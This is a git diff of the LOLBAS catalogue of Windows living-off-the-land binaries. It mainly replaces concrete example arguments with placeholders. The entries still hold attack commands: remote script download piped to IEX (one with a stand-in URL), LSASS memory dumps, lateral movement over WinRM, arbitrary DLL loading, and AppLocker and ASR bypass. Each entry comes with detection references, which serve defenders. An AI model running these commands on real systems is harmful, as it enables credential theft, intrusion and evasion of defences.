@@ -1,10 +1,10 @@ --- Name: Pubprn.vbs Description: Proxy execution with Pubprn.vbs -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct + - Command: pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct} Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 7f71efb..fc1c0f9 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -1,10 +1,10 @@ --- Name: Syncappvpublishingserver.vbs Description: Script used related to app-v and publishing server -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" + - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Inject PowerShell script code with the provided arguments Usecase: Use Powershell host invoked from vbs script Category: Execute diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index cb86feb..4c456d5 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -15,8 +15,6 @@ Commands: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml Resources: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 7e375cc..9ceb622 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml 
@@ -1,10 +1,10 @@ --- Name: winrm.vbs Description: Script used for manage Windows RM settings -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="{CMD}"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Usecase: Proxy execution Category: Execute @@ -14,7 +14,7 @@ Commands: Tags: - Execute: CMD - Execute: Remote - - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="{CMD}"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index c8b1d9f..53f768c 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -1,11 +1,11 @@ --- Name: Pester.bat Description: Used as part of the Powershell pester -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" - Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + - Command: Pester.bat [/help|?|-?|/?] "$null; {CMD}" + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Usecase: Proxy execution Category: Execute Privileges: User 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. Example here executes calc.exe + - Command: Pester.bat ;{PATH:.exe} + Description: Execute code using Pester. Example here executes specified executable. Usecase: Proxy execution Category: Execute Privileges: User @@ -23,9 +23,7 @@ Commands: Tags: - Execute: EXE Full_Path: - - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat -Code_Sample: - - Code: + - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml Resources: diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 23154c1..637581a 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -1,10 +1,10 @@ --- Name: AccCheckConsole.exe Description: Verifies UI accessibility requirements -Author: 'bohops' +Author: bohops Created: 2022-01-02 Commands: - - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll + - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code from assembly DLL. Category: Execute 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: DLL (.NET) - - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll + - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 142ad7a..f7212b0 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -4,14 +4,14 @@ Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-09-01 Commands: - - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet + - Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - - Command: adplus.exe -c config-adplus.xml + - Command: adplus.exe -c {PATH:.xml} Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute 
@@ -20,14 +20,14 @@ Commands: OperatingSystem: All Windows Tags: - Execute: CMD - - Command: adplus.exe -c config-adplus.xml + - Command: adplus.exe -c {PATH:.xml} Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - - Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe + - Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe} Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. Usecase: Run commands under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 5e95bac..65523d2 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -1,10 +1,10 @@ --- Name: AgentExecutor.exe Description: Intune Management Extension included on Intune Managed Devices -Author: 'Eleftherios Panos' +Author: Eleftherios Panos Created: 2020-07-23 Commands: - - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 + - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument Usecase: Execute unsigned powershell scripts Category: Execute 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: PowerShell - - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 - Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully + - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "{PATH_ABSOLUTE:folder}" 0 1 + Description: If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE Category: Execute Privileges: User @@ -24,8 +24,6 @@ Commands: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml index a423ff3..2fee1e5 100644 --- a/yml/OtherMSBinaries/Appcert.yml +++ b/yml/OtherMSBinaries/Appcert.yml 
@@ -4,7 +4,7 @@ Description: Windows App Certification Kit command-line tool. Author: Avihay Eldad Created: 2024-03-06 Commands: - - Command: appcert.exe test -apptype desktop -setuppath c:\windows\system32\notepad.exe -reportoutputpath c:\users\public\output.xml + - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Execute an executable file via the Windows App Certification Kit command-line tool. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml + - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code Category: Execute diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index 620916d..94df70a 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml 
@@ -1,28 +1,19 @@ --- Name: Appvlp.exe Description: Application Virtualization Utility Included with Microsoft Office 2016 -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: AppVLP.exe \\webdav\calc.bat + - Command: AppVLP.exe {PATH_SMB:.bat} Usecase: Execution of BAT file hosted on Webdav server. - Description: Executes calc.bat through AppVLP.exe + Description: Executes .bat file through AppVLP.exe Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 Tags: - Execute: CMD - - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" - Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). - Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 w/Office 2016 - Tags: - - Execute: EXE - - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" + - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Category: Execute diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index c61401a..454d7d9 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml 
@@ -1,11 +1,11 @@ --- Name: Bginfo.exe Description: Background Information Utility included with SysInternals Suite -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bginfo.exe bginfo.bgi /popup /nolicprompt - Description: Execute VBscript code that is referenced within the bginfo.bgi file. + - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt + Description: Execute VBscript code that is referenced within the specified .bgi file. Usecase: Local execution of VBScript Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: bginfo.exe bginfo.bgi /popup /nolicprompt - Description: Execute VBscript code that is referenced within the bginfo.bgi file. + - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt + Description: Execute VBscript code that is referenced within the specified .bgi file. Usecase: Local execution of VBScript Category: AWL Bypass Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt + - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: Execute @@ -31,7 +31,7 @@ Commands: Tags: - Execute: WSH OperatingSystem: Windows - - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt + - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: AWL Bypass 
@@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt + - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: Execute @@ -50,7 +50,7 @@ Commands: Tags: - Execute: WSH - Execute: Remote - - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt + - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 87aa504..e5c9f38 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools. Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cdb.exe -cf x64_calc.wds -o notepad.exe - Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. + - Command: cdb.exe -cf {PATH:.wds} -o notepad.exe + Description: Launch 64-bit shellcode from the specified .wds file using cdb.exe. Usecase: Local execution of assembly shellcode. Category: Execute Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Execute: Shellcode - Command: | - cdb.exe -pd -pn - .shell + cdb.exe -pd -pn {process_name} + .shell {CMD} Description: Attaching to any process and executing shell commands. Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute 
@@ -24,7 +24,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: CMD - - Command: cdb.exe -c C:\debug-script.txt calc + - Command: cdb.exe -c {PATH:.txt} "{CMD}" Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 7bbacc2..07b5b28 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -4,7 +4,7 @@ Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads Author: Martin Sohn Christensen Created: 2020-10-09 Commands: - - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name + - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Usecase: Execute DLL code Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: DLL - - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name + - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code Category: AWL Bypass @@ -34,8 +34,6 @@ Commands: Full_Path: - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" diff --git a/yml/OtherMSBinaries/Createdump.yml b/yml/OtherMSBinaries/Createdump.yml index 8498c5b..9b35f53 100644 
--- a/yml/OtherMSBinaries/Createdump.yml +++ b/yml/OtherMSBinaries/Createdump.yml @@ -4,7 +4,7 @@ Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core) Author: mr.d0x, Daniel Santos Created: 2022-01-20 Commands: - - Command: createdump.exe -n -f dump.dmp [PID] + - Command: createdump.exe -n -f {PATH:.dmp} {PID} Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process. Usecase: Dump process memory contents using PID. Category: Dump diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 2a15866..9eb534b 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -1,10 +1,10 @@ --- Name: csi.exe Description: Command line interface included with Visual Studio. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: csi.exe file + - Command: csi.exe {PATH:.cs} Description: Use csi.exe to run unsigned C# code. Usecase: Local execution of unsigned C# code. Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a72e4b6..23c5bca 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml 
@@ -1,10 +1,10 @@ --- Name: DefaultPack.EXE -Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. +Description: This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. Author: '@checkymander' Created: 2020-10-01 Commands: - - Command: DefaultPack.EXE /C:"process.exe args" + - Command: DefaultPack.EXE /C:"{CMD}" Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support. Usecase: Can be used to execute stagers, binaries, and other malicious commands. Category: Execute @@ -15,8 +15,6 @@ Commands: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml - IOC: DefaultPack.EXE spawned an unknown process diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml index e02a700..d73159b 100644 --- a/yml/OtherMSBinaries/Devinit.yml +++ b/yml/OtherMSBinaries/Devinit.yml @@ -4,7 +4,7 @@ Description: Visual Studio 2019 tool Author: mr.d0x Created: 2022-01-20 Commands: - - Command: devinit.exe run -t msi-install -i https://example.com/out.msi + - Command: devinit.exe run -t msi-install -i {REMOTEURL:.msi} Description: Downloads an MSI file to C:\Windows\Installer and then installs it. Usecase: Executes code from a (remote) MSI file. Category: Execute diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index f6f9eea..ded9944 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml 
@@ -1,10 +1,10 @@ --- Name: Devtoolslauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. -Author: 'felamos' +Author: felamos Created: 2019-10-04 Commands: - - Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test + - Command: devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - Execute: CMD - - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test + - Command: devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} "{CMD:args}" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute @@ -24,8 +24,6 @@ Commands: - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml - IOC: DeveloperToolsSvc.exe spawned an unknown process diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index f54457e..b8c947b 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml 
@@ -1,11 +1,11 @@ --- Name: dnx.exe -Description: .Net Execution environment file included with .Net. -Author: 'Oddvar Moe' +Description: .NET Execution environment file included with .NET. +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: dnx.exe consoleapp - Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) + - Command: dnx.exe {PATH_ABSOLUTE:folder} + Description: Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) Usecase: Local execution of C# project stored in consoleapp folder. Category: Execute Privileges: User @@ -15,8 +15,6 @@ Commands: - Execute: CSharp Full_Path: - Path: no default -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 16b369e..8f7c7b1 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -1,11 +1,11 @@ --- Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework -Author: 'felamos' +Author: felamos Created: 2019-11-12 Commands: - - Command: dotnet.exe [PATH_TO_DLL] - Description: dotnet.exe will execute any dll even if applocker is enabled. + - Command: dotnet.exe {PATH:.dll} + Description: dotnet.exe will execute any DLL even if applocker is enabled. Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 7 and up with .NET installed Tags: - Execute: DLL (.NET) - - Command: dotnet.exe [PATH_TO_DLL] + - Command: dotnet.exe {PATH:.dll} Description: dotnet.exe will execute any DLL. Usecase: Execute DLL Category: Execute @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10 and up with .NET SDK installed Tags: - Execute: FSharp - - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] + - Command: dotnet.exe msbuild {PATH:.csproj} Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Dsdbutil.yml b/yml/OtherMSBinaries/Dsdbutil.yml index 65f5f18..0507c87 100644 --- a/yml/OtherMSBinaries/Dsdbutil.yml +++ b/yml/OtherMSBinaries/Dsdbutil.yml @@ -44,8 +44,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\dsdbutil.exe - Path: C:\Windows\SysWOW64\dsdbutil.exe -Code_Sample: - - Code: Detection: - IOC: Event ID 4688 - IOC: dsdbutil.exe process creation diff --git a/yml/OtherMSBinaries/Dtutil.yml b/yml/OtherMSBinaries/Dtutil.yml index b1b85a3..6cbe4ff 100644 --- a/yml/OtherMSBinaries/Dtutil.yml +++ b/yml/OtherMSBinaries/Dtutil.yml @@ -4,7 +4,7 @@ Description: Microsoft command line utility used to manage SQL Server Integratio Author: Avihay Eldad Created: 2024-06-17 Commands: - - Command: dtutil.exe /FILE C:\Windows\System32\calc.exe /COPY FILE;C:\Users\Public\calc.exe + - Command: dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext} Description: Copy file from source to destination Usecase: Use to copies the source file to the destination file Category: Copy diff --git a/yml/OtherMSBinaries/Dump64.yml b/yml/OtherMSBinaries/Dump64.yml index 065c30b..96bd0d8 100644 --- a/yml/OtherMSBinaries/Dump64.yml +++ b/yml/OtherMSBinaries/Dump64.yml 
@@ -4,7 +4,7 @@ Description: Memory dump tool that comes with Microsoft Visual Studio Author: mr.d0x Created: 2021-11-16 Commands: - - Command: dump64.exe out.dmp + - Command: dump64.exe {PID} out.dmp Description: Creates a memory dump of the LSASS process. Usecase: Create memory dump and parse it offline to retrieve credentials. Category: Dump diff --git a/yml/OtherMSBinaries/DumpMinitool.yml b/yml/OtherMSBinaries/DumpMinitool.yml index 0869139..48ae469 100644 --- a/yml/OtherMSBinaries/DumpMinitool.yml +++ b/yml/OtherMSBinaries/DumpMinitool.yml @@ -4,7 +4,7 @@ Description: Dump tool part Visual Studio 2022 Author: mr.d0x Created: 2022-01-20 Commands: - - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full + - Command: DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 05ac2aa..a9b6b2d 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml 
@@ -1,11 +1,11 @@ --- Name: Dxcap.exe Description: DirectX diagnostics/debugger included with Visual Studio. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe - Description: 'Launch notepad.exe as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.' + - Command: Dxcap.exe -c {PATH_ABSOLUTE:.exe} + Description: 'Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.' Usecase: Local execution of a process as a subprocess of dxcap.exe Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index b89523a..cac0146 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll + - Command: Excel.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download @@ -29,8 +29,6 @@ Full_Path: - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml - IOC: Suspicious Office application Internet/network traffic 
